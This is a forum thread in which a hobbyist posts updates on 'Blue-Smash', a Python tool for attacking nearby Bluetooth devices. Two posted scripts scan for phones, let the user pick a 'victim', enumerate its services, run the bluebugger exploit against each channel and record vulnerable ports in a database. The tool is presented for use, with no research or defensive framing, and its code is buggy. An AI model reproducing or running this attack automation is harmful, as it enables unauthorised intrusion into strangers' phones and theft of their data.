Hey guys
Sorry I haven't been around, I've just moved into my new flat over jan and have been decorating etc.
I've now got an internet connectionand I am going to start work again on blue-track, but I'm going to change the name because of a snotty email lol
I'l will post more soon
Cheers
tH3 Gr33n5t3r
Well sorry bout the last version of blue-track did it actually work? lol
Blue-Smash v1.0a
Looking into adding a sqlite db for autopwn etc and looking into a couple of more exploits to add.
Enjoy
Hey again guys
First thing is that I've noticed yet more tyop's in my code sorry
Next is I've started work on the autopwn function. I don't think I can get this to work exactly the same as metasploits because I do not have the skill. Instead I am going to code it so it checks all blue tooth exploits to a chosen targets and prints out a report that tells you if any of the exploits were successful.
In future version I hope to add device type and manufacturer detection for a more targeted approach. Also planning a blue tooth chat function and a blue tooth virtual keyboard :P
I've done the scanning and profiling stuff and now working on the exploit stuff.
If anybody spots anything a bit back to front or wrong let me know as I'm still learningCode:#### blue-smash autopwn #### try: import os,time,sys from pysqlite2 import dbapi2 as sqlite from bluetooth import * except ImportError, e: raise ImportError("Your system is missing some dependencies, Please read the README file.") # scan for nearby devices print "Blue-Smash Autopwn Function :p" print "Scanning for devices......." listno1 = 0 nearby_devices = discover_devices(lookup_names = True) # create menu for name, addr in nearby_devices: listno1 += (1) print "%s) %s - %s" % (listno1, name, addr) victim = raw_input ("Choose a Number....:") # create DB if victim == '%s'% (listno1): if os.path.exists(name): print "DB already exists! Removing old DB......." os.system("rm %s" % (name)) print "Creating sqlite DB %s" % (name) con1 = sqlite.connect (name) c = con1.cursor() c.execute('''CREATE TABLE fingerprint_results ( id INTEGER PRIMARY KEY, name TEXT, port TEXT, status TEXT )''') services = find_service(address=name) if len(services) > 0: print "Blue-Smash found %d services on %s" % (len(services), name) print else: print "Sorry no services were found on %s :("% (name) for svc in services: print "Found %s on channel/PSM %s"% (svc["name"],svc["port"]) c.execute('insert into fingerprint_results values (null, ?, ?, null)', (svc["name"],svc["port"])) con1.commit() print "Exploiting %s Stand by MwHaAhaA"% (name) else: print "Error!!! Blue-Smash will now exit."
UPDATE
Sorry noticed mods keep having to squeeze my post my appologies
Just been playing around and came up with this little script. It scan's for devices, finds all open ports, creates a DB, checks all ports to see if the device is vulnerable to the bluebugger exploit and saves this info to the DB. This is abit untidy but works :P
Code:# autopwn brainstorm try: import os,time,sys from pysqlite2 import dbapi2 as sqlite from bluetooth import * except ImportError, e: raise ImportError("Your system is missing some dependencies, Please read the README file.") # define bluebugger test exploit def exp_bluebugger(): print "Creating temp RFCOMM Device" if not os.path.exists("/dev/rfcomm0"): os.spawnlp(os.P_WAIT,'mknod','mknod','/dev/rfcomm0','c','216','0') print "Starting Bluebugger..." con1 = sqlite.connect (name) c = con1.cursor() c.execute("select port from fingerprint_results order by port") print (svc["port"]) auto_bluebugger=os.popen("bluebugger -c %s -o bluebugger.txt -a %s info "% (svc["port"],name)) # scan for devices print "Blue-Smash Autopwn Function :p" print "Scanning for devices......." listno1 = 0 nearby_devices = discover_devices(lookup_names = True) for name, addr in nearby_devices: listno1 += (1) print "%s) %s - %s" % (listno1, name, addr) victim = raw_input ("Choose a Number....:") # Create DB if victim == '%s'% (listno1): if os.path.exists(name): print "DB already exists! Removing old DB......." os.system("rm %s" % (name)) print "Creating sqlite DB %s" % (name) con1 = sqlite.connect (name) c = con1.cursor() c.execute('''CREATE TABLE fingerprint_results ( id INTEGER PRIMARY KEY, name TEXT, port TEXT, status TEXT )''') # profile device services = find_service(address=name) if len(services) > 0: print "Blue-Smash found %d services on %s" % (len(services), name) print else: print "Sorry no services were found on %s :("% (name) fileno = 0 for svc in services: fileno += (1) print "Found %s on channel/PSM %s"% (svc["name"],svc["port"]) # Call exploit function exp_bluebugger() # check to see if port is vunerable & update DB vun_check = open("bluebugger.txt", "r") linelist = vun_check.readlines() vun_check.close() if len(linelist) > 6: c.execute('insert into fingerprint_results (id, name, port, status) values (null, ?, ?, ?)', (svc["name"],svc["port"], 'y')) con1.commit() print ":) is vulnerable" else: c.execute('insert into fingerprint_results (id, name, port, status) values (null, ?, ?, ?)', (svc["name"],svc["port"], 'n')) con1.commit() print ":( Not vulnerable" vun_check.close() else: print "Error!!! target doesn't exist :D autopwn will now exit." # EOF Biatch :P
Also want to start learning C. But it should include the bluetooth chat and hid keyboard function.
.All you need is the master's MAC and one of the slave's and you are good to go.
Originally Posted by Ralhaz
